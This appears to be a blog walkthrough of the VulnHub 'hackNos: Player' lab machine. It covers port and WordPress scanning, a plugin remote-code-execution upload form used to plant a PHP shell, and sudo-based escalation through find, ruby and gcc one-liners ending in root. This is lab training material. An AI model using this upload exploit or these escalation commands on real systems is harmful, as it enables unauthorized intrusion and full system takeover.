VulnHub Link: https://www.vulnhub.com/entry/hacknos-player,459/
A default apache2 page appears …
Nmap Scan:
> nmap -sC -sV 192.168.9.105 --unprivileged
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 17:55 W. Central Africa Standard Time
Strange read error from 192.168.9.105 (203 - 'Unknown error')
Strange read error from 192.168.9.105 (203 - 'Unknown error')
Nmap scan report for 192.168.9.105
Host is up (1.0s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd (broken: not found: directory given in 'secure_chroot_dir':/var/ftp/vsftpd)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
543/tcp filtered klogin
3306/tcp open mysql MySQL 5.5.5-10.3.18-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.18-MariaDB-0+deb10u1
| Thread ID: 38
| Capabilities flags: 63486
| Some Capabilities: FoundRows, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsTransactions, IgnoreSigpipes, InteractiveClient, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, Speaks41ProtocolOld, ODBCClient, ConnectWithDatabase, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: 9Svy{|~%8)d@QU7S};JE
|_ Auth Plugin Name: mysql_native_password
5051/tcp filtered ida-agent
Service Info: OS: UnixService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.45 seconds
We have 3 opened ports
FTP + APACHE + MYSQL
I ran a quick dirbuster but got nothing in back ! …
I had to make another nmap scan for all ports and I had to go back to the apache2 default page and start doing some manually things as looking at the source code ….
Something was weird !
The default Debian document root is /var/www/html/g@web.
You can make your own virtual hosts under /var/www/mini@web.
This is different to previous releases which provides better security out of the box.We have a WordPress Script here ! …
I ran a quick wpscan (The log below isn’t complete, I had to cut only interested parts … and it an old version of wpscan)
> wpscan -u http://192.168.9.105/g@web/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o [A]bort, default: [N]n
[+] URL: http://192.168.9.105/g@web/
[+] Started: Wed Apr 8 18:10:58 2020[!] The WordPress 'http://192.168.9.105/g@web/readme.html' file exists exposing a version number
[+] Interesting header: LINK: <http://192.168.9.105/g@web/index.php/wp-json/>; rel="https://api.w.org/"
[+] Interesting header: LINK: <http://192.168.9.105/g@web/>; rel=shortlink
[+] Interesting header: SERVER: Apache/2.4.38 (Debian)
[!] Registration is enabled: http://192.168.9.105/g@web/wp-login.php?action=register
[+] XML-RPC Interface available under: http://192.168.9.105/g@web/xmlrpc.php
[!] Upload directory has directory listing enabled: http://192.168.9.105/g@web/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://192.168.9.105/g@web/wp-includes/......[+] Name: wp-support-plus-responsive-ticket-system - v7.1.3
| Location: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/
| Readme: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
[!] The version is out of date, the latest version is 9.1.2
[!] Directory listing is enabled: http://192.168.9.105/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/[!] Title: WP Support Plus Responsive Ticket System <= 7.1.3 – Authenticated SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8699
Reference: http://lenonleite.com.br/en/blog/2016/12/13/wp-support-plus-responsive-ticket-system-wordpress-plugin-sql-injection/
Reference: https://plugins.trac.wordpress.org/changeset/1556644/wp-support-plus-responsive-ticket-system
Reference: https://www.exploit-db.com/exploits/40939/
[i] Fixed in: 8.0.0[!] Title: WP Support Plus Responsive Ticket System <= 8.0.7 - Remote Code Execution (RCE)
Reference: https://wpvulndb.com/vulnerabilities/8949
Reference: https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system
[i] Fixed in: 8.0.8..........
I had to run another one in my KaliLinux with the new version
root@x00xKaliLinux:~# wpscan --url http://192.168.9.105/g@web/ -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team
Version 3.7.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.[+] URL: http://192.168.9.105/g@web/ [192.168.9.105]
[+] Started: Thu Apr 9 21:20:20 2020Interesting Finding(s):[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.9.105/g@web/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] http://192.168.9.105/g@web/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Registration is enabled: http://192.168.9.105/g@web/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.9.105/g@web/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.9.105/g@web/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.9.105/g@web/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.9.105/g@web/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>[+] WordPress theme in use: twentyseventeen
| Location: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/
| Latest Version: 2.3 (up to date)
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/readme.txt
| Style URL: http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.9.105/g@web/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <===========================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] wp-local
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.9.105/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
By going to this link :
http://192.168.9.105/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1we got something …
"you can upgrade you shell using hackNos@9012!!"I tried it as password for the user but nothing :(
So I had to go back to the old version above “wpscan log” cause I noticed somehow a RCE Exploit (https://wpvulndb.com/vulnerabilities/8949)
<form method="post" enctype="multipart/form-data" action="http://192.168.9.105/g@web/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>by putting the code above in a html file and browse it and then choose the phtml file/shell to upload …
we got this json
{"isError":"0","errorMessege":"done","attachment_id":"1"}and by going to
http://192.168.9.105/g@web/wp-content/uploads/wpsp/
You’ll find the PHTML file :D
So now I have to upload my php shell and run it :D (without forgetting to run the listener)
after this let’s start enumerating to get root …
As a start and as always I see if there is any sudo bins and that by sending
sudo -l
security@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for security on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser security may run the following commands on hacknos:
(hacknos-boat) NOPASSWD: /usr/bin/find
so to jump to hacknos-boat we have to go back to GTFOBins
and for find bin it says
find . -exec /bin/sh -p \; -quitI changed sh to bash for a good shell and I ran it
security@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -u hackNos-boat find . -exec /bin/bash -p \; -quit
< -u hackNos-boat find . -exec /bin/bash -p \; -quit
hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$We are with hackNos-boat now :D (the Upper case in letter N is required)
now doing the same I did before I mean sudo -l
hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for hackNos-boat on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser hackNos-boat may run the following commands on hacknos:
(hunter) NOPASSWD: /usr/bin/ruby
and from GTFOBins
ruby -e 'exec "/bin/sh"'the same operation as the previous change sh to bash
hackNos-boat@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
<p$ sudo -u hunter /usr/bin/ruby -e 'exec "/bin/bash"'
hunter@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$and we are hunter now :p
I remember that there we a file in hunter home directory
hunter@hacknos:~$ cat user.txt
cat user.txt
MD5USER: 4676cd2e30b6d0b8650d14a5dd9f16c3I tried to crack it but nothing in return … let’s do what we do for the previous users maybe we’ll get root
with the same operation …
hunter@hacknos:/var/www/html/g@web/wp-content/uploads/wpsp$ sudo -l
sudo -l
Matching Defaults entries for hunter on hacknos:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser hunter may run the following commands on hacknos:
(ALL) NOPASSWD: /usr/bin/gcc
it was clear from the beginning so from GTFOBins
sudo gcc -wrapper /bin/sh,-s .by changing again :p sh to bash and running that
hunter@hacknos:~$ sudo gcc -wrapper /bin/bash,-s .
sudo gcc -wrapper /bin/bash,-s .
root@hacknos:/home/hunter# id
id
uid=0(root) gid=0(root) groups=0(root)
root@hacknos:/home/hunter#We are R00T :D
Hope you enjoyed my WriteUp / WalkThrough :D
Follow me on Twitter : https://twitter.com/ab2pentest
If you liked my writeup and to support me for more :
https://www.buymeacoffee.com/ab2pentest
Other writeup’s and tool’s can be found here:
https://github.com/ab2pentest
